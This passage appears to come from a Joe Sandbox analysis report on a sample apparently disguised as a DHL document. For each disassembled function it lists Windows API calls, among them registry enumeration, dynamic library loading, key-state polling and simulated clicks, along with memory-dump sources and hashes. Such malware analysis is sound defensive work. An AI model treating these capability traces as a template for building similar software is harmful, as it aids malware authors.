                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 1559183368-0
                                                                                        • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                        • Instruction ID: d2fd06acabef0982da95313ba6e710723e3d49f1939fb1b323fa87153bd4c263
                                                                                        • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                        • Instruction Fuzzy Hash: C851C471A00B25DBCB24DF69F88066FB7A6AF40325F248739F83596AD0D770DE909B40
                                                                                        Function 00C80037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                          • Part of subcall function 00C80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7FDAD,?,?), ref: 00C80E31
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C800FD
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C8013C
                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C80183
                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00C801AF
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C801BC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 3440857362-0
                                                                                        • Opcode ID: f65671772f2b4e5f5c7f64b66064be9b9cd9385531cc2cee4af6020c69891cca
                                                                                        • Instruction ID: e6fc002380ddf4da183c5ed34c136ae02c9e792aeb4f6978a13d86b64ef7a339
                                                                                        • Opcode Fuzzy Hash: f65671772f2b4e5f5c7f64b66064be9b9cd9385531cc2cee4af6020c69891cca
                                                                                        • Instruction Fuzzy Hash: 8F517B31208204AFC704EF58C885F6EB7E8FF84318F50892DF596872A2DB31E949DB56
                                                                                        Function 00C7D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C7D927
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00C7D9AA
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C7D9C6
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00C7DA07
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C7DA21
                                                                                          • Part of subcall function 00C05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C67896,?,?,00000000), ref: 00C05A2C
                                                                                          • Part of subcall function 00C05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C67896,?,?,00000000,?,?), ref: 00C05A50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 327935632-0
                                                                                        • Opcode ID: 1a00b8317c346872ab09b5373bc95bd7de30e441ea033b9e74b97736d2fd6d95
                                                                                        • Instruction ID: 392d9bcc34d5cc8c4c675335c3fc83956b87abcad1238fa7df1a90715189ed4c
                                                                                        • Opcode Fuzzy Hash: 1a00b8317c346872ab09b5373bc95bd7de30e441ea033b9e74b97736d2fd6d95
                                                                                        • Instruction Fuzzy Hash: 5F510975A04205DFCB00EFA8C484AADB7B5FF09320F14C169E95AAB352DB31AE46DF51
                                                                                        Function 00C6E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C6E61F
                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C6E648
                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C6E687
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C6E6AC
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C6E6B4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1389676194-0
                                                                                        • Opcode ID: 55170da582794c1450b1a77211d4f1f29ee230ab0d06113eea57f67f5ed8f34e
                                                                                        • Instruction ID: afceafcfa51945a7925203f2e9759e651aede017a449f57e78303c504a8084ac
                                                                                        • Opcode Fuzzy Hash: 55170da582794c1450b1a77211d4f1f29ee230ab0d06113eea57f67f5ed8f34e
                                                                                        • Instruction Fuzzy Hash: 2E511D79A00105DFCB11EF64C981AAEBBF5EF09314F1480A9E859AB3A2CB31ED11DF50
                                                                                        Function 00C02344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 00C02357
                                                                                        • ScreenToClient.USER32(00CC57B0,?), ref: 00C02374
                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00C02399
                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00C023A7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                        • String ID:
                                                                                        • API String ID: 4210589936-0
                                                                                        • Opcode ID: c2794a857488c0d091eeb761a14c67db3d36772c77f0710e187f1bf9c74a6309
                                                                                        • Instruction ID: 24619e95b332d124ad556b8f0127db6a916ac002ea6a2f9f95e891358d061a5e
                                                                                        • Opcode Fuzzy Hash: c2794a857488c0d091eeb761a14c67db3d36772c77f0710e187f1bf9c74a6309
                                                                                        • Instruction Fuzzy Hash: 44414F35604119FBDF199F69C888AEDBB78BB05364F204359F939A22E0C7349E50EF91
                                                                                        Function 00C563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C563E7
                                                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00C56433
                                                                                        • TranslateMessage.USER32(?), ref: 00C5645C
                                                                                        • DispatchMessageW.USER32(?), ref: 00C56466
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C56475
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                        • String ID:
                                                                                        • API String ID: 2108273632-0
                                                                                        • Opcode ID: 830394d255b4ef602a5603387b6dd641a0b8bd64304223e049a43074ca306929
                                                                                        • Instruction ID: bbd72688ed147da7a2b8759d54191e721d62cc23c1e350b337905f81ffc69905
                                                                                        • Opcode Fuzzy Hash: 830394d255b4ef602a5603387b6dd641a0b8bd64304223e049a43074ca306929
                                                                                        • Instruction Fuzzy Hash: AC31A275A40646AFDB64CFB0DC44FBA7BE8AB01306F940169E821C31A1E735A9CDD768
                                                                                        Function 00C58A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00C58A30
                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00C58ADA
                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C58AE2
                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00C58AF0
                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C58AF8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3382505437-0
                                                                                        • Opcode ID: 8e11f6ad8c9d3abf8897ef936fa2e369cb26e7b8922cef0eefcaa73a20573cd1
                                                                                        • Instruction ID: 49ba962ae2eb4c1339c34b6f2e204e7437e3942a5f38415fc8b2451986e360ce
                                                                                        • Opcode Fuzzy Hash: 8e11f6ad8c9d3abf8897ef936fa2e369cb26e7b8922cef0eefcaa73a20573cd1
                                                                                        • Instruction Fuzzy Hash: 7931DF71500219EBDF14CFA8D94CB9E3BB5EB04316F10822AF924E71D1C7B09A58EB94
                                                                                        Function 00C8B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C8B192
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00C8B1B7
                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C8B1CF
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00C8B1F8
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C70E90,00000000), ref: 00C8B216
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2294984445-0
                                                                                        • Opcode ID: 9272c5e6c56173ecb4dfc4b76fd79f88da8d58ae1445b95fda184e1071b8e8cd
                                                                                        • Instruction ID: 958652609d3d2759822f05fdca6958b5d95eb5c69ad8917e383f835eb5b65525
                                                                                        • Opcode Fuzzy Hash: 9272c5e6c56173ecb4dfc4b76fd79f88da8d58ae1445b95fda184e1071b8e8cd
                                                                                        • Instruction Fuzzy Hash: 5D218D71A10651AFCB20AF39DC18B6E3BA4FB05325F154728F932D71E0E7309D619B98
                                                                                        Function 00C75A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 00C75A6E
                                                                                        • GetForegroundWindow.USER32 ref: 00C75A85
                                                                                        • GetDC.USER32(00000000), ref: 00C75AC1
                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00C75ACD
                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00C75B08
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                        • String ID:
                                                                                        • API String ID: 4156661090-0
                                                                                        • Opcode ID: 0846de0bdb2f51e2f104a15fd7512423aa6ab7ce2b5b984e7f1cdbb34b734556
                                                                                        • Instruction ID: e211f9028d68abad54b8655aa74b02fc3d74c4573b9ba794355581b4b1005de0
                                                                                        • Opcode Fuzzy Hash: 0846de0bdb2f51e2f104a15fd7512423aa6ab7ce2b5b984e7f1cdbb34b734556
                                                                                        • Instruction Fuzzy Hash: 7A219F35A00204AFDB10EF65D888BAEBBE5EF48310F14C17DF94997362DA70AD41DB90
                                                                                        Function 00C012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C0134D
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00C0135C
                                                                                        • BeginPath.GDI32(?), ref: 00C01373
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00C0139C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                        • String ID:
                                                                                        • API String ID: 3225163088-0
                                                                                        • Opcode ID: ba97803e8c46b97e0b635732a0ef7f90fe31ddc65270f654e7e7193e992b8006
                                                                                        • Instruction ID: 9a11d3b06eab83d3c052c4888b46ad53f01b04d1303c389eec62ca18a43f4593
                                                                                        • Opcode Fuzzy Hash: ba97803e8c46b97e0b635732a0ef7f90fe31ddc65270f654e7e7193e992b8006
                                                                                        • Instruction Fuzzy Hash: DD213D70840708EFDB119F25DC49B6DBBE8FB10761F58422AF820961F0D771A996DF91
                                                                                        Function 00C5BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 2931989736-0
                                                                                        • Opcode ID: cfcb98c37b4a14dfa3df6412795ed97031a9f1c121c92b9fe82cf0af39d4967a
                                                                                        • Instruction ID: 5924d143ba68a5e3743c256676127faa4a29b2dc6916b7246dbc42056308bb33
                                                                                        • Opcode Fuzzy Hash: cfcb98c37b4a14dfa3df6412795ed97031a9f1c121c92b9fe82cf0af39d4967a
                                                                                        • Instruction Fuzzy Hash: E201B5766001197BE6046B16AD42FBBBB5CDF30389B184021FD1996346FB50FE5492AC
                                                                                        Function 00C64A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00C64ABA
                                                                                        • __beginthreadex.LIBCMT ref: 00C64AD8
                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00C64AED
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C64B03
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C64B0A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                        • String ID:
                                                                                        • API String ID: 3824534824-0
                                                                                        • Opcode ID: 6b6352f6557d6c9275742241199e4be03aecd211f79fbffa4071761bccf190cc
                                                                                        • Instruction ID: 4ff2f54fbe79ab92e058c808cf4f5c2b20a2c1054e4eda5c2a7f2900c5692de6
                                                                                        • Opcode Fuzzy Hash: 6b6352f6557d6c9275742241199e4be03aecd211f79fbffa4071761bccf190cc
                                                                                        • Instruction Fuzzy Hash: 47114472D08618BBC7108FA8EC48F9F7FACEB85320F144269F824D3260D670DD4087A0
                                                                                        Function 00C58202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C5821E
                                                                                        • GetLastError.KERNEL32(?,00C57CE2,?,?,?), ref: 00C58228
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00C57CE2,?,?,?), ref: 00C58237
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00C57CE2,?,?,?), ref: 00C5823E
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C58255
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 842720411-0
                                                                                        • Opcode ID: 15bea2b84707e15e5be3859830e55a762806abb120f858008b41085ff1bbb88c
                                                                                        • Instruction ID: 12aa48ab9fa9c1dcfbb7dbf83ccb99bc400b6b90f9f2577d81f09905aab808a2
                                                                                        • Opcode Fuzzy Hash: 15bea2b84707e15e5be3859830e55a762806abb120f858008b41085ff1bbb88c
                                                                                        • Instruction Fuzzy Hash: 9C014675200204BFDB204FA6DC88E6F7FACEF8A755B500529F859D2260DA318D59CB64
                                                                                        Function 00C5710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?,?,?,00C57455), ref: 00C57127
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?,?), ref: 00C57142
                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?,?), ref: 00C57150
                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?), ref: 00C57160
                                                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?,?), ref: 00C5716C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 3897988419-0
                                                                                        • Opcode ID: e15b1f9677e3e4bf061301b247637e4466a7a4ccc9801e16642c37047a4eda46
                                                                                        • Instruction ID: 958ceec5786cc156718381dc1974a7cfa5156820801e2c9c16078bb3069c3ed6
                                                                                        • Opcode Fuzzy Hash: e15b1f9677e3e4bf061301b247637e4466a7a4ccc9801e16642c37047a4eda46
                                                                                        • Instruction Fuzzy Hash: 9101BC7A600604ABCB104F65EC48BAE7BADEB44792F100268FD08D3220DB71DEC18BA4
                                                                                        Function 00C65244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
